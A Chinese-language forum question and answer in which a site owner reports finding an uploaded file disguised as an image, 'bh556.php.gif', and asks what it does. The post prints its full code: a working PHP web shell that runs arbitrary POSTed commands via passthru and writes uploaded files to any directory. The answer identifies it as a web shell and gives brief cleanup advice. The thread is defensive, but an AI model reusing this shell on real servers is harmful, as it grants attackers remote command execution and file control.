可能的网站黑客攻击尝试

Question

我刚从我的主人那里得到了一条温暖的信息告诉我..“我们检测到有人试图通过http或ftp访问您的帐户”

检查完恶意文件后，有人上传了一个名为"bh556.php.gif“的图标

打开此文件，其中包含以下代码：

<html>
<head>
<div align="left"><font size="1">Input command :</font></div>
<form name="cmd" method="POST" enctype="multipart/form-data">
<input type="text" name="cmd" size="30" class="input"><br>
<pre>
<?php
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
passthru($cmd);
}
?>
</pre>
<hr>
<div align="left"><font size="1">Uploader file :</font></div>

<?php
$uploaded = $_FILES['file']['tmp_name'];
if (file_exists($uploaded)) {
   $pwddir = $_POST['dir'];
   $real = $_FILES['file']['name'];
   $dez = $pwddir."/".$real;
   copy($uploaded, $dez);
   echo "FILE UPLOADED TO $dez";
}
?>     </pre>
<form name="form1" method="post" enctype="multipart/form-data">
 <input type="text" name="dir" size="30" value="<? passthru("pwd"); ?>">
 <input type="submit" name="submit2" value="Upload">
 <input type="file" name="file" size="15">
      </td>
    </tr>
</table>
</body>
</html>

有没有人可以解释一下如何防止这个通过图标再次上传，也请解释一下上面的代码到底在做什么？

Answer 1

这是一个PHP Webshell，查看here中常用的一个列表。它允许恶意用户通过PHP文件执行命令，这是非常危险的。

通过标题和一些巧妙的技巧将它们隐藏在图像中是很常见的，请参阅解释here

我的建议是，删除文件，解决泄漏的原因，这可能是某种类型的注入攻击。